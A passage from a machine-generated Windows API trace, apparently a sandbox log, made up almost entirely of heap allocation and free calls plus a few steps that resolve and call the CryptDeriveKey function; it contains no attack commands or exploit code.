returned 0x3be0048 [0259.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0259.938] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55298 [0259.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55138 [0259.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552f8 [0259.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0259.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551b8 [0259.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0259.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0259.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0259.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0259.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0259.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0259.938] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0259.938] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551f8 [0259.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0259.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0259.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55178 [0259.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0259.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0259.939] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0259.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0259.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51e68 [0259.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0259.939] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0259.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55138 [0259.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55118 [0259.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0259.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0259.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0259.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0259.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0259.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0259.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55308 [0259.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0259.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0259.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0259.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55128 [0259.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0259.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0259.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0259.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551e8 [0259.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0259.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0259.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0259.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0259.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0259.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552a8 [0259.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0259.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552f8 [0259.940] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0259.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0259.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0259.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51cb8 [0259.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0259.940] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0259.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55188 [0259.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55278 [0259.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0259.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0259.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0259.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0259.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0259.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0259.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55278 [0259.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0259.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0259.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0259.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55128 [0259.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0259.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0259.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55298 [0259.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0259.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0259.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0259.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0259.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0259.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55228 [0259.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0259.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0259.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55188 [0259.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0259.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0259.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0259.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55248 [0259.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0259.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0259.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55308 [0259.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0259.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0259.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0259.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552b8 [0259.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0259.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552f8 [0259.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0259.941] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0259.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0259.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551a8 [0259.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0259.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0259.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0259.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0259.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0259.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0259.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0259.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0259.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0259.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0259.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0259.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0259.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0259.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0259.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0259.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55118 [0259.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0259.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0259.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0259.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0259.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0259.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0259.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0259.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0259.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55288 [0259.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0259.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0259.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55308 [0259.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0259.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0259.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0259.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0259.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0259.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0259.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0259.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0259.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0259.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0259.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0259.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0259.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0259.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0259.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0259.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0259.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55258 [0259.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0259.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551a8 [0259.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0259.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0259.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0259.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0259.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0259.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0259.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0259.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0259.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0259.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51da8 [0259.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51da8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0259.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0259.944] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0259.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0259.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0259.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0259.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0259.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0259.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0259.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0259.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55148 [0259.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0259.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0259.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0259.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0259.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0259.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0259.945] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87610, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87590) returned 1 [0259.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0259.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0259.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0259.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0259.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0259.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0259.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0259.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0259.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0259.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0259.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0259.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0259.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0259.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0259.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0259.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0259.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0259.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0259.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0259.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0259.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0259.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0259.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0259.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0259.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0259.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0259.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f70 [0259.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0259.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f70 | out: hHeap=0x970000) returned 1 [0259.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0259.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0259.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0259.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52090 [0259.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52078 [0259.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0259.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52078 | out: hHeap=0x970000) returned 1 [0259.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0259.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52090 | out: hHeap=0x970000) returned 1 [0259.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520c0 [0259.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520d8 [0259.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520f0 [0259.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0259.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520f0 | out: hHeap=0x970000) returned 1 [0259.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0259.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520d8 | out: hHeap=0x970000) returned 1 [0259.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0259.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0259.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0259.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0259.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0259.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0259.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0259.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0259.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0259.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0259.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0259.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0259.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0259.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0259.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0259.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0259.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0259.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0259.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0259.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0259.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0259.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0259.948] HeapFree (in: 